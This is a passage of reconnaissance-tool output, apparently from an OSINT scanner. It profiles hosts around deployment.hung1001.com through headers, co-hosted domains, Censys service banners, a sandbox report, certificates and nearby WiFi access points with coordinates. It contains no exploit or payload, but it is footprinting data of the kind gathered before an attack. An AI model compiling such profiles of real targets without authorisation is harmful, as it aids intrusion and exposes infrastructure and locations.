"https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzKaRobkAwv3vxw3jMhVENGA.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzOgdm0LZdjqr5-oayXSOefg.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/k3k702ZOKiLJc3WVjuplzP8zf_FOSsgRmwsS7Aa9k2w.woff2"\n Pattern match: "https://fonts.gstatic.com/s/opensans/v13/59ZRklaO5bWGqF5A9baEERJtnKITppOI | 185.199.109.153 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5454e7fad90297-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.96.1 |
| 2023-05-12 02:54:13 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5016a1cc062a51-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.169): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NETGEAR (Net ID: 00:09:5B:D9:B2:92) | 39.0469, -77.4903 |
| 2023-05-12 03:16:21 | Raw Data from RIRs | No | ipapi.co | 0 | 0 | 2 | 0 | None | {u'region_code': u'ENG', u'country_tld': u'.uk', u'ip': u'2a06:98c1:3120::1', u'currency_name': u'Pound', u'currency': u'GBP', u'country_population': 66488991, u'country_code': u'GB', u'timezone': u'Europe/London', u'city': u'London', u'network': u'2a06:98c1::/32', u'languages': u'en-GB,cy-GB,gd', u'version': u'IPv6', u'latitude': 51.5095, u'in_eu': False, u'utc_offset': u'+0100', u'continent_code': u'EU', u'country_name': u'United Kingdom', u'country_capital': u'London', u'org': u'CLOUDFLARENET', u'postal': u'EC4N', u'asn': u'AS13335', u'country': u'GB', u'region': u'England', u'longitude': -0.0955, u'country_calling_code': u'+44', u'country_area': 244820.0, u'country_code_iso3': u'GBR'} | 2a06:98c1:3120::1 |
| 2023-05-12 02:44:19 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.110.153 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | MarvellAP8x (Net ID: 00:01:36:16:7E:FB) | 37.7813933,-122.3918002 |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 01010101coder.github.io | 185.199.111.153 |
| 2023-05-12 03:09:28 | Co-Hosted Site | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | acilacikveteriner.com | 87.248.157.102 |
| 2023-05-12 02:48:58 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://deployment.hung1001.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e70_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_e70_IESQMMUTEX_0_519"\n "IsoScope_e70_ConnHashTable<3696>_HashTable_Mutex"\n "IsoScope_e70_IESQMMUTEX_0_331"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_e70_IE_EarlyTabStart_0x9e0_Mutex"\n "IsoScope_e70_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3696"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "185.199.110.153:443"\n 
"104.16.89.20:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"deployment.hung1001.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "deployment.hung1001.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"* Copyright 2011-2016 Twitter, Inc." 
(Indicator: "twitter")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarC53C.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabC52B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabC52B.tmp]- [targetUID: 00000000-00003432]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003432]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpdeployment.hung1001.com" has type "HTML document UTF-8 Unicode text"- [targetUID: N/A]\n "_992E54E5-CD8F-11ED-8D0C-080027A296EA_.dat" has type "Composite Document File V2 Document Cannot read section 
info"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003432]\n "CabC52B.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabC52B.tmp]- [targetUID: 00000000-00003432]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "~DF67EEE4888DD5E710.TMP" has type "data"- Location: [%TEMP%\\~DF67EEE4888DD5E710.TMP]- [targetUID: 00000000-00003696]\n "1BGFX3G1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\1BGFX3G1.txt]- [targetUID: 00000000-00003696]\n "0M49AE3M.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\0M49AE3M.txt]- [targetUID: 00000000-00003696]\n "~DF88C37032F716BF51.TMP" has type "data"- Location: [%TEMP%\\~DF88C37032F716BF51.TMP]- [targetUID: 00000000-00003696]\n "~DFE99CBDD6FC466412.TMP" has type "data"- Location: [%TEMP%\\~DFE99CBDD6FC466412.TMP]- [targetUID: 00000000-00003696]\n "favicon_6_.png" has type "PNG image data 32 x 32 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "BISQWXD2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BISQWXD2.txt]- [targetUID: 00000000-00003696]\n "XYZCPKU1.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\XYZCPKU1.txt]- [targetUID: 00000000-00003696]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "bootstrap.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "~DF5D8C007EB74B1E29.TMP" has type "data"- Location: [%TEMP%\\~DF5D8C007EB74B1E29.TMP]- [targetUID: 00000000-00003696]\n "main_1_.js" has type "ASCII text"- [targetUID: N/A]\n "clipboard.min_1_.js" has type "UTF-8 Unicode text with 
very long lines"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://getbootstrap.com"\n Pattern match: "https://zenorocha.github.io/clipboard.js"\n Pattern match: "https://github.com/twbs/bootstrap/blob/master/LICENSE"\n Pattern match: "github.com/necolas/normalize.css"\n Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "jquery.org/license"\n Pattern match: "C.JgU/0$"\n Pattern match: "https://hung1001.github.io/assests/images/1.jpg"\n Pattern match: "msdn.microsoft.com/en-us/library/cc722477.aspx"\n Pattern match: "cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/css/bootstrap.min.css"\n Pattern match: "cdn.jsdelivr.net/npm/bootstrap@3.3.7/dist/js/bootstrap.min.js"\n Pattern match: "cdn.jsdelivr.net/npm/clipboard@2.0.4/dist/clipboard.min.js"\n Pattern match: "cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"\n Pattern match: "MUID146012C6BB7767E008770024BAF36692msn.com/1025385438284831101987262314288931023516*"\n Heuristic match: 
"cdn.jsdelivr.net"\n Heuristic match: "deployment.hung1001.com"\n Heuristic match: "GET / HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: deployment.hung1001.com"\n Pattern match: "https://deployment.hung1001.com/Accept-Language"\n Pattern match: "http://deployment.hung1001.com"\n Pattern match: "http://deployment.hung1001.com/"\n Pattern match: "isdomainmigratedtruewww.msn.com/102545283507231059743262314288931023516*"\n Pattern match: "MUIDB34F1697C9B5A69502FD47B9E9ADE6822ieonline.microsoft.com/9216385438284831101987262001788931023516*"\n Pattern match: "msdn.microsoft.com/en-us/library/windows/desktop/ms717801(v=vs.85).aspx"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "SUIDMmicrosoft.com/9216372189363231023633262001788931023516*MUID34F1697C9B5A69502FD47B9E9ADE6822microsoft.com/1025385438284831101987262001788931023516*_EDGE_V1microsoft.com/9216385438284831101987262017413931023516*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "SUIDMmicrosoft.com/9216372189363231023633262001788931023516*MUID34F | 185.199.110.153 |
| 2023-05-12 03:08:45 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.212 | 104.196.30.220 |
| 2023-05-12 02:44:21 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | githubusercontent.com | 185.199.108.153 |
| 2023-05-12 03:00:28 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | chacha20-poly1305@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T17:34:59.155Z", "ip": "165.232.113.85", "labels": ["remote-access"], "location_updated_at": "2023-05-07T02:12:11.614586Z", "autonomous_system_updated_at": "2023-05-07T02:12:11.614661Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-03-14T04:19:27.651284527Z"}, "donation.ecash-pay.com": {"record_type": "A", "resolved_at": "2023-05-02T14:52:26.416247013Z"}, "ir.unoix.xyz": {"record_type": "A", "resolved_at": "2023-02-24T09:36:05.967059332Z"}, "cw8d1e.easypanel.host": {"record_type": "A", "resolved_at": "2023-04-26T18:13:54.295361033Z"}, "www.donation.ecash-pay.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:21:06.212577360Z"}}, "names": ["cw8d1e.easypanel.host", "donation.ecash-pay.com", "ir.unoix.xyz", "kekw.battleb0t.xyz", "www.donation.ecash-pay.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.248.133.186", "extended_service_name": "SSH", "observed_at": "2023-05-11T00:26:20.725509381Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_NTT", "transport_fingerprint": {"raw": 
"65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "468524f109ad3925211cfe755beb70d9d361e6b16882cdc3a4df2bd7a75ea822", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "qEQb2J/p1gtQSyf7LjYce8VteZ3JO4CSQ9vSfPw9RFI=", "x": "XuSrdLhzIT/D0WARwSsM6RVmszeetwTsDG1sOtrp9H0=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", 
"diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://165.232.113.85/"}, "response": {"body": "<html>\r\n<head><title>404 Not 
Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.18.0 (Ubuntu)</center>\r\n</body>\r\n</html>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "404 Not Found", "protocol": "HTTP/1.1", "body_size": 162, "body_hashes": ["sha256:340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87", "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f"], "status_code": 404, "body_hash": "sha1:d01c97e2944166ed23e47e4a62ff471ab8fa031f", "headers": {"Date": ["<REDACTED>"], "_encoding": {"Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Server": ["nginx/1.18.0 (Ubuntu)"]}, "html_tags": ["<title>404 Not Found</title>"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:47993c12bd45511268c274adb000951fc2436ea5a8e968b2b1f7b49fb5b05631"], "source_ip": "167.94.146.57", "extended_service_name": "HTTP", "observed_at": "2023-05-11T09:00:02.235713315Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a5365727665723a206e67696e782f312e31382e3020285562756e7475290d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_TELIA", "banner": "HTTP/1.1 404 Not Found\r\nServer: nginx/1.18.0 (Ubuntu)\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "version": "1.18.0", "source": "OSI_APPLICATION_LAYER", "other": {"family": "nginx"}, "uniform_resource_identifier": 
"cpe:2.3:a:f5:nginx:1.18.0:*:*:*:*:*:*:*", "part": "a"}]}, {"tls": {"version_selected": "TLSv1_3", "certificates": {"_encoding": {"chain_fps_sha_256": "DISPLAY_HEX", "leaf_fp_sha_256": "DISPLAY_HEX"}, "chain_fps_sha_256": ["67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd", "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"], "chain": [{"issuer_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "subject_dn": "C=US, O=Let's Encrypt, CN=R3", "fingerprint": "67add1166b020ae61b8f5fc96813c04c2aa589960796865572a3c7e737613dfd"}, {"issuer_dn": "O=Digital Signature Trust Co., CN=DST Root CA X3", "subject_dn": "C=US, O=Internet Security Research Group, CN=ISRG Root X1", "fingerprint": "6d99fb265eb1c5b3744765fcbc648f3cd8e1bffafdc4c2f99b9d47cf7ff1c24f"}], "leaf_data": {"pubkey_algorithm": "ECDSA", "public_key": {"key_algorithm": "ECDSA", "ecdsa": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "nHw/fXpTPJPh7RXQY/HEObaMVLT3ke0kPIUIN0WUC1w=", "x": "mCLSeRXmhneu3ZkCqqpIEcT5t89qEuMj/T3Pv+htI2M=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}, "fingerprint": "30f014a772b2784f28cc0c8eda057a195b3550629cbebeeea563bf4fba71e48c"}, "subject_dn": "CN=donation.ecash-pay.com", "pubkey_bit_size": 256, "fingerprint": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16", "issuer_dn": "C=US, O=Let's Encrypt, CN=R3", "names": ["donation.ecash-pay.com", "www.donation.ecash-pay.com"], "tbs_fingerprint": "7067e77960f4c789c8e143e4facda20855c120250ec8bfd5b30f06f36bf85662", "subject": {"common_name": ["donation.ecash-pay.com"]}, "signature": {"self_signed": 
false, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["R3"], "organization": ["Let's Encrypt"], "country": ["US"]}}, "leaf_fp_sha_256": "b03940956d13966c7021bd8a13ab577121aab54f7e834862bc0c5e3c438b4b16"}, "cipher_selected": "TLS_CHACHA20_POLY1305_SHA256", "ja3s": "475c9302dc42b2751db9edcac3b74891", "_encoding": {"ja3s": "DISPLAY_HEX"}}, "_encoding": {"banner": "DISPLAY_UTF8", "banne |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:80 | 172.67.135.9 |
| 2023-05-12 02:44:22 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 16 00:40:11.019 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:3B:02:0B:A2:9E:E2:86:CB:95:75:BB:27:
6B:53:31:16:B5:86:49:63:A8:15:4C:A6:35:A9:06:89:
64:81:81:8A:02:21:00:DB:BF:EF:1B:02:D3:29:C8:31:
